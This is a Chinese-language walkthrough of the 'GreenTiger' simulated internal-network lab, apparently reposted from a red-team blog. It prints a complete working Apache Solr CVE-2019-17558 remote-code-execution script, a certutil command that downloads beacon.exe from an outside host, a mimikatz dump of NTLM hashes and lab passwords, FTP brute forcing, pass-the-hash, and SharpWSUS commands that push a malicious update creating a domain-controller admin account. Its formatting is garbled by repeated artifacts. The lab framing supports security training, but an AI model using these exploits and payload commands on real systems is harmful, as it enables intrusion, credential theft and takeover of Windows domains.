文章总结: 本文详细记录了内网仿真靶机《GreenTiger》的完整渗透测试过程。攻击者首先通过nmap扫描发现目标主机运行ApacheSolr8.2.0,利用CVE-2019-17558漏洞获取初始shell并上传木马;随后进行内网横向移动,发现JBoss框架并利用反序列化漏洞获取system权限,最终成功获取flag。文档提供了具体的漏洞利用代码和操作命令,具有实战指导价值。 综合评分: 82 文章分类: 渗透测试,内网渗透,红队,WEB安全,漏洞分析
内网仿真靶机《GreenTiger》wp
原创
plag plag
红队蓝军
2026年6月22日 18:00 四川
在小说阅读器读本章
去阅读
第一台入口web
首先扫描一下
```
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linenmap -A 172.5.5.5
Starting Nmap 7.95 ( https://nmap.org )Nmap scan report for 172.5.5.5Host is up (0.058s latency).Not shown: 995 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http Apache Solr| http-title: Solr Admin|Requested resource was http://172.5.5.5/solr/135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds?5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|http-title: Not Found|http-server-header: Microsoft-HTTPAPI/2.0Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results:|clock-skew: -8h00m00s| smb2-time:| date: 2025-07-01T19:20:13|_ startdate: N/A| smb2-security-mode:| 3:1:1:| Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 113.00 seconds
访问172.5.5.5得到为solr框架,版本为8.2.0
直接该版本漏洞
直接用CVE-2019-17558的exp获得shell
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line#!/usr/bin/python3
–– coding:utf-8 –-# author:zhzyker# from:https://github.com/zhzyker/exphub# telegram:t.me/zhzyker
import requestsimport sysimport json
if len(sys.argv)!=2: print(‘+————————————————————+’) print(‘+ DES: by zhzyker as https://github.com/zhzyker/exphub +’) print(‘+ Apache Solr Velocity Commons Remote Code Execution +’) print(‘+————————————————————+’) print(‘+ USE: python3 cve-2019-17558cmd.py
apiurl = url + “/solr/” +corename+ “/config”headers = {“Content-Type”: “application/json”}setapidata =”””{ “update-queryresponsewriter”: { “startup”: “lazy”, “name”: “velocity”, “class”: “solr.VelocityResponseWriter”, “template.base.dir”: “”, “solr.resource.loader.enabled”: “true”, “params.resource.loader.enabled”: “true” }}”””api = requests.request(“POST”, url=apiurl, data=setapidata, headers=headers)code = str(api.statuscode)if api.status_code == 200: print (“[+]
def doexp(cmd): vulnurl = url+”/solr/”+corename+”/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27″+cmd+”%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end” r = requests.request(“GET”, vulnurl) print (r.text) while 1: cmd = input(“Shell >>> “) if cmd == “exit” : exit(0) do_exp(cmd)
ounter(linepython3 cve-2019-17558_cmd.py http://172.5.5.5
certutil下马,执行并上线
ounter(linecertutil -urlcache -split -f http://172.16.233.2/beacon.exe 1.exe
获取flag
# 内网web
信息搜集得到双网卡
端口扫描得到存活ip为172.6.6.8,存在特征端口8080
访问为jboss框架
这里扫描jboss存在的漏洞得到jboss反序列化,system权限
看下当前主机有没有av
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line映像名称 PID 服务
========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 244 暂缺 csrss.exe 332 暂缺 csrss.exe 416 暂缺 wininit.exe 432 暂缺 winlogon.exe 464 暂缺 services.exe 532 暂缺 lsass.exe 540 KeyIso, Netlogon, SamSs, VaultSvc svchost.exe 612 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBroker svchost.exe 664 RpcEptMapper, RpcSs dwm.exe 744 暂缺 svchost.exe 776 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc, Schedule, seclogon, SENS, ShellHWDetection, Themes, UserManager, Winmgmt, WpnService, wuauserv svchost.exe 848 Dhcp, EventLog, lmhosts, TimeBrokerSvc svchost.exe 856 EventSystem, FontCache, LicenseManager, netprofm, nsi, W32Time, WinHttpAutoProxySvc svchost.exe 892 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 900 NcbService, PcaSvc, StorSvc, TrkWks, UALSVC, wudfsvc svchost.exe 96 BFE, CoreMessagingRegistrar, DPS, MpsSvc svchost.exe 588 Wcmsvc svchost.exe 1240 Browser, LanmanServer svchost.exe 1292 PolicyAgent spoolsv.exe 1528 Spooler svchost.exe 1628 AppHostSvc svchost.exe 1640 ftpsvc svchost.exe 1652 DiagTrack svchost.exe 1676 StateRepository, tiledatamodelsvc jbosssvc.exe 1712 JBAS60SVC svchost.exe 1724 W3SVC, WAS cmd.exe 1636 暂缺 conhost.exe 1084 暂缺 java.exe 2384 暂缺 ChsIME.exe 2476 暂缺 RuntimeBroker.exe 2676 暂缺 sihost.exe 2712 暂缺 svchost.exe 2724 CDPUserSvc24738, OneSyncSvc24738 taskhostw.exe 2748 暂缺 ChsIME.exe 2960 暂缺 explorer.exe 736 暂缺 ShellExperienceHost.exe 2452 暂缺 SearchUI.exe 3000 暂缺 shutdown.exe 3336 暂缺 conhost.exe 3344 暂缺 ServerManager.exe 3536 暂缺 jusched.exe 3860 暂缺 msdtc.exe 2408 MSDTC cmd.exe 3836 暂缺 conhost.exe 2472 暂缺 LogonUI.exe 1044 暂缺 LockAppHost.exe 3452 暂缺 taskhostw.exe 2332 暂缺 cmd.exe 2300 暂缺 conhost.exe 2280 暂缺 tasklist.exe 3220 暂缺 WmiPrvSE.exe 2292 暂缺
没av直接tcp连接
dump hash一下,得到域用户`cslabwow : cyber@w0w`
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineAuthentication Id : 0 ; 1156178 (00000000:0011a452)
Session : Service from 0User Name : DefaultAppPoolDomain : IIS APPPOOLLogon Server : (null)Logon Time : 2025/7/2 11:49:21SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * NTLM : fb2989339d031d96df706a5329cdff20 * SHA1 : 3207b6487c95fa27eec180f97d3ac72c3aeeff00 tspkg : wdigest : * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : CYBERWEB$ * Domain : cyberstrikelab.com * Password : 34 6e f6 86 c9 9f 0f 34 29 16 9c 35 77 49 50 3f b7 47 74 c4 b7 70 5b f8 99 36 6c 00 16 a7 5e 21 5a 35 5c 33 06 51 a6 22 d8 ce 75 3d cb 69 3e e6 84 05 4b 31 43 da 81 4d dd 0f 1c 04 3c 1d 3f d7 13 f7 d9 cd 1b 06 9a 1f 86 05 6a 32 49 15 c3 b0 ff 91 cd b8 a5 4b d6 b5 80 00 03 dd 0b a8 cc 65 c3 11 a6 a1 15 fb d5 3e 32 38 2d d4 64 d2 2a ec 9e 6f e6 b0 ad d8 4d f2 d0 b8 9b ec f4 0a a1 5a 88 f9 fe b3 12 e6 26 25 e4 b4 f3 1f 34 e2 36 fc 44 16 36 88 5b bc 29 f0 3b 70 11 c2 cb 4c b6 9c 7b df 2c 78 90 5e d8 0e 0a 97 81 97 86 c8 71 bb af 1a b8 a5 ac b6 c7 86 05 ab a6 bf 62 da 0c f8 39 ff 7f 4a a0 cf ce b7 22 e3 be 78 9a a5 a3 64 91 b8 ed 0c 2a 77 d5 8e 86 20 52 e7 4d 77 d5 c7 aa e0 33 01 65 ca fa 2d c3 ba 69 af d2 fe 3c 64 ssp : credman : Authentication Id : 0 ; 52353 (00000000:0000cc81)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2025/7/2 11:08:11SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * NTLM : fb2989339d031d96df706a5329cdff20 * SHA1 : 3207b6487c95fa27eec180f97d3ac72c3aeeff00 tspkg : wdigest : * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : CYBERWEB$ * Domain : cyberstrikelab.com * Password : 34 6e f6 86 c9 9f 0f 34 29 16 9c 35 77 49 50 3f b7 47 74 c4 b7 70 5b f8 99 36 6c 00 16 a7 5e 21 5a 35 5c 33 06 51 a6 22 d8 ce 75 3d cb 69 3e e6 84 05 4b 31 43 da 81 4d dd 0f 1c 04 3c 1d 3f d7 13 f7 d9 cd 1b 06 9a 1f 86 05 6a 32 49 15 c3 b0 ff 91 cd b8 a5 4b d6 b5 80 00 03 dd 0b a8 cc 65 c3 11 a6 a1 15 fb d5 3e 32 38 2d d4 64 d2 2a ec 9e 6f e6 b0 ad d8 4d f2 d0 b8 9b ec f4 0a a1 5a 88 f9 fe b3 12 e6 26 25 e4 b4 f3 1f 34 e2 36 fc 44 16 36 88 5b bc 29 f0 3b 70 11 c2 cb 4c b6 9c 7b df 2c 78 90 5e d8 0e 0a 97 81 97 86 c8 71 bb af 1a b8 a5 ac b6 c7 86 05 ab a6 bf 62 da 0c f8 39 ff 7f 4a a0 cf ce b7 22 e3 be 78 9a a5 a3 64 91 b8 ed 0c 2a 77 d5 8e 86 20 52 e7 4d 77 d5 c7 aa e0 33 01 65 ca fa 2d c3 ba 69 af d2 fe 3c 64 ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : CYBERWEB$Domain : CYBERSTRIKELABLogon Server : (null)Logon Time : 2025/7/2 11:08:08SID : S-1-5-20 msv : [00000003] Primary * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * NTLM : fb2989339d031d96df706a5329cdff20 * SHA1 : 3207b6487c95fa27eec180f97d3ac72c3aeeff00 tspkg : wdigest : * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : cyberweb$ * Domain : CYBERSTRIKELAB.COM * Password : (null) ssp : credman : Authentication Id : 0 ; 448536 (00000000:0006d818)Session : Interactive from 0User Name : cslabwowDomain : CYBERSTRIKELABLogon Server : DCLogon Time : 2025/7/2 19:12:41SID : S-1-5-21-4286488488-1212600890-1604239976-1105 msv : [00000003] Primary * Username : cslabwow * Domain : CYBERSTRIKELAB * NTLM : adae448c0f5694a408f161b7d1cddd41 * SHA1 : dbf32faf57d185b3022e922ba4abb3569179a2be * DPAPI : 9e03a63de59aebacbede596a3472a196 tspkg : wdigest : * Username : cslabwow * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : cslabwow * Domain : CYBERSTRIKELAB.COM * Password : cyber@w0w ssp : credman : Authentication Id : 0 ; 140908 (00000000:0002266c)Session : Interactive from 1User Name : AdministratorDomain : CYBERWEBLogon Server : CYBERWEBLogon Time : 2025/7/2 11:09:20SID : S-1-5-21-332097019-2215467117-1557799732-500 msv : [00000003] Primary * Username : Administrator * Domain : CYBERWEB * NTLM : b39db959b4663dc5334c3e6cb3183f03 * SHA1 : af4eefa50c4fbca36e849c0d9cff1e4639555eff tspkg : wdigest : * Username : Administrator * Domain : CYBERWEB * Password : (null) kerberos : * Username : Administrator * Domain : CYBERWEB * Password : (null) ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3)Session : Service from 0User Name : IUSRDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2025/7/2 11:08:33SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2025/7/2 11:08:12SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 52372 (00000000:0000cc94)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2025/7/2 11:08:11SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * NTLM : f6c4e5bcec90eff929409a7d5a865bc3 * SHA1 : 83f28da48338bf5a57d123ed5d32fcfaab6d007b tspkg : wdigest : * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : CYBERWEB$ * Domain : cyberstrikelab.com * Password : c5 d7 05 35 0b d6 98 38 03 c0 00 ac 86 c1 f4 f4 81 6f 56 95 52 7c 55 64 f6 2a 72 2d 41 02 ff 2c 4b 32 d9 d5 5f b8 44 e0 08 e7 3c 67 5d 3f ac c4 4e 3c d4 69 94 15 25 f7 53 6a 15 d9 6b 3c a3 66 a2 c2 57 bb 9e 10 2c 2d a5 bd 89 25 1d e1 4b 99 f5 c8 4e 72 eb d0 ed 68 26 65 58 37 d3 5c 15 c9 6d 92 a5 4e 8c cf 97 eb b5 93 d4 23 bf cb 8a 43 4e 74 d8 ec 41 2c dc 91 f1 7b f0 e1 3c 8b 33 b4 00 82 c5 37 d8 0d f8 b5 79 75 19 90 50 b2 b4 c9 58 72 93 c4 6d 26 7e 17 de 3e 54 74 1b 32 65 34 12 54 e2 8a 55 9d 31 25 e6 c6 81 4a fb b8 e6 ef 0a ca be 75 5f fe e8 8f ea a5 6b ac bc da 02 40 90 ea 1c c9 ed 08 00 66 ea 59 60 f1 7d 96 c6 b8 f1 a5 3d 8e 21 72 18 f6 7a 1a 7c d1 0f 46 e3 a5 84 e5 05 a7 c4 ed ad 87 89 17 12 57 a2 b3 a8 1f ssp : credman : Authentication Id : 0 ; 24449 (00000000:00005f81)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2025/7/2 11:08:06SID : msv : [00000003] Primary * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * NTLM : fb2989339d031d96df706a5329cdff20 * SHA1 : 3207b6487c95fa27eec180f97d3ac72c3aeeff00 tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : CYBERWEB$Domain : CYBERSTRIKELABLogon Server : (null)Logon Time : 2025/7/2 11:08:06SID : S-1-5-18 msv : tspkg : wdigest : * Username : CYBERWEB$ * Domain : CYBERSTRIKELAB * Password : (null) kerberos : * Username : cyberweb$ * Domain : CYBERSTRIKELAB.COM * Password : (null) ssp : credman :
# 内网横向
venom做二层代理
代理到本地8998端口
端口扫描得到存在ftp服务,ftp爆破得到账号密码`admin/qwe!@#123`
得到文本文档,密码为cs1ab@wq
转MD5
直接pth
成功上线
# DC
发现web2为wsus服务器
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linebeacon> shell reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
[*] Tasked beacon to run: reg query HKEYLOCALMACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate[+] host called home, sent: 109 bytes[+] received output: HKEYLOCALMACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REGSZ http://10.8.8.60:8530 WUStatusServer REGSZ http://10.8.8.60:8530 UpdateServiceUrlAlternate REGSZ http://10.8.8.60:8530 HKEYLOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
用psexec执行添加本地管理员组的恶意补丁
ounter(lineSharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^&^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"
updateid是补丁的更新id
创建组Demo Group并将DC加入Demo Group,设置恶意补丁作用于Demo Group
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineSharpWSUS.exe approve /updateid:b95933c9-084a-4b66-b3a0-2c2cd38261ed /computername:DC.cyberstrikelab.com /groupname:"Demo Group"
_ _ __ ___ _ _ ____/ __|| |_ __ _ _ __ _ _\ \ / / ___|| | | / __|__ | ‘_ \ / ` | ‘| ‘ \ \ /\ / /_ | | | ___ \ ) | | | | (| | | | |) \ V V / ) | || |) ||/|| ||_,|| | ./ _/_/ |/ _/|/ || Phil Keeble @ Nettitude Red Team [] Action: Approve Update Targeting dc.cyberstrikelab.comTargetComputer, ComputerID, TargetID————————————dc.cyberstrikelab.com, 824bcb21-c250-4bfc-86f9-c25c3d199d8b, 2Group Exists = TrueAdded Computer To GroupApproved Update [] Approve complete
检查组是否创建
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(linecmd > SharpWSUS.exe inspect
_ _ __ ___ _ _ ____/ __|| |_ __ _ _ __ _ _\ \ / / ___|| | | / __|__ | ‘_ \ / ` | ‘| ‘ \ \ /\ / /_ | | | ___ \ ) | | | | (| | | | |) \ V V / ) | || |) ||/|| ||_,|| | ./ _/_/ |/ _/|/ || Phil Keeble @ Nettitude Red Team [*] Action: Inspect WSUS Server
########### WSUS Server Enumeration via SQL ##################ServerName, WSUSPortNumber, WSUSContentLocation———————————————–WEB2, 8530, c:\WSUS\WsusContent
################# Computer Enumeration #######################ComputerName, IPAddress, OSVersion, LastCheckInTime—————————————————cyberweb.cyberstrikelab.com, 10.8.8.12, 10.0.14393.2273, 2025/5/24 11:18:05dc.cyberstrikelab.com, 10.8.8.55, 10.0.14393.2273,web2.cyberstrikelab.com, 10.8.8.60, 10.0.14393.1794, 2025/6/16 7:39:24
################# Downstream Server Enumeration #######################ComputerName, OSVersion, LastCheckInTime—————————————————
################# Group Enumeration #######################GroupName—————————————————All ComputersDemo GroupDownstream Servers
[*] Inspect complete
查看补丁是否被安装
ounter(lineSharpWSUS.exe check /updateid:b95933c9-084a-4b66-b3a0-2c2cd38261ed /computername:DC.cyberstrikelab.com
“`
获取更新状态
管理界面也能看到
安装更新后,恶意补丁成功创建了本地管理员账户
成功上线
靶场地址:
https://www.cyberstrikelab.com/#/scene/detail/41
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:红队蓝军 plag plag《内网仿真靶机《GreenTiger》wp》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论